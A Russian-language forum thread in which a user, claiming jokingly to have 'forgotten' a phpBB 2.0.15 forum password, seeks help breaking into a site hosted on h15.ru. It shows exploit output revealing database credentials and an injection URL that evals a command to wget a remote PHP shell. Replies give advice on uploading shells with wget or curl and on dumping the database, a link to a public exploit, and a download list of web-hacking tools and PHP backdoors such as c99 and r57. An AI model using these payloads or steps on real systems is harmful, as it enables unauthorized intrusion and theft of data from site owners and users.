Всем привет! Забыл пароль от форума phpbb ;)

заюзал сплойтик, узнал пасс и логин к дб., но адресок к дб мне совсем не понравился, выглядело это вот так

Connecting OK
Sending exploit OK
Database Host: database
Database Name: xxxxxx5
Username: xxxxxx5
Password: xxxxxx5

гугл подсказал мне, что это нормально, т к доступ к mySQL на h15.ru возможен только с локал машины.

Это так???

Далее появилась идея залить с помощью PuttyFTP, скриптик, который копернул бы всю БД.
Но опять столкнулся с проблемой такого содержания, врубил Putty, указал адресок, ввел логин, а вот пасс вводиться не хочет, ни руками, ни копипастом.
Пробывал логиниться через браузер, но натыкаюсь на 403 - Forbidden
Попробывал зарегить, свой сайтик, чтобы протестить Putty на нем, но рега временно в дауне (((
Что здесь может быть не так???
Или просто у них вместе с регой и авторизация в дауне?
И вообще верна ли логика моих действий? или есть способы получше?

...а вот пасс вводиться не хочет, ни руками, ни копипастом.
o.0
Хы тоже высаживался в первые разы...Когда вводишь, он не отображается на экране, ни звездочками, никак.
Тоесть: ввел и жми.

Хуже нет, когда пароль не знаешь, да еще и забыл ))

1). Залей шелл. Если смог вытащить пароли к бд, то это не проблема. В нормальном есть функция бекапа базы (хоть с локалхоста)
2). найди на сайте что-то вроде phpmyadmin

P.S. ты указываешь пароли от БД к акку от FTP?

Всем огромное спасибо, у меня еще 1 вопрос.
Не знаю о хосте на холме нечего, в мануале ихнем написано

Для администрирования Ваших виртуальных серверов мы предоставляем Ваш shell доступ. Он также необходим для работы с БД MySQL и отладки CGI скриптов. Доступ к shell осуществляется с помощью SSH-клиента. Для его использования Вам необходимо скачать и установить SSH-клиент, например Putty. В архиве кроме самого ssh клиента находится утилита, аналогичная утилите scp, которая позволяет осуществлять копирование файлов. Настройка клиента сводится к указанию имени хоста, указания протокола, вводу имени пользователя и пароля. Для нашего сервера это:

Пароль: Ваш пароль в системе (тот же, что и для FTP доступа)
Возможно ли изменить пассы там, т е на фтпшник и mySQL разные поставить?
Просто что то не могу я залогиться на фтп(

ты указываешь пароли от БД к акку от FTP?насколько я понял, сплойт дает 1 пасс от бд и это наверно от фтп тоже, судя из выше описанного. нет?

там и так разные уже...

нет. сплоит тебе вернул пароль от БД. ФТП аккаунт (как и SSH) совсем другой :)

там и так разные уже...
понятно...
В силу слабых знаний, на этом мои гениальные идеи заканчиваются)) Можно еще чтонить сделать, зная только пасс от бд на локалмашине? форум phpbb v2.0.15

в третьем сверху сообщении я тебе уже ответил :)

в третьем сверху сообщении я тебе уже ответил :)
Я не особо знаком с такими методами, я пока литературку полопачу, а ты если сможеш отпишись мне сеня в асю плз.

Помогите плз.
phpbb 2.0.15
Вообщем вот что мне удалось узнать

http://site.h15.ru/forum//viewtopic.php?t=&highlight='.phpinfo().'

Put_phpinfo: [/home/b/site.h15.ru/WWW/forum//viewtopic.php]

Смогу ли я залить шелл таким запросом???

http://site.h15/forum/viewtopic.php?&cmd=wget http://shells//fuck.php;&highlight='.eval($HTTP_GET_VARS[cmd]).'

Или нет???
Ответьте плз..

И еще огромная просьба, кто может дать шел, чтобы стибрить всю sql, зная логин и пасс???

Если я не прав, то плз подробно опишите куда, как, что и как потом достать)))

Вообще пробывал заюзать сплойт
http://milw0rm.com/exploits/1076
Не смог, т не знаю какой командой залить шел, оп пристал ко мне с табличкой вида
site.h15.ru/forum/$ а что написать я незнаю....

юзай nst shell :) Вообще на хэ15 дыры же латают я думаю сплойт который есть в паблике врятли поможет

Шелл заливается командой wget http://адресс шела
Главное чтобы в адресе cd была папка с правами на запись
Ну если у тебя есть права на выполнение то можно chmod 777 команду выполнить
ещё есть команды curl -0 ./shell.php http://адресс (вроде так)

Кстати на тут есть всякие разные включая nst

Apache Hacking TooLz Directory:

Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script


Remote File Inclusion And Remote Command Execution Directory:

IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter


Databases & SQL Injection & XSS TooLz Directory

Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells

**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView
nstview php shell

Скачать с Рапиды (http://rapidshare.com/files/2447667/WebHacking_TooLz.rar)

Big THX

По теме, вытащил все забытые пароли)
Но другим способом)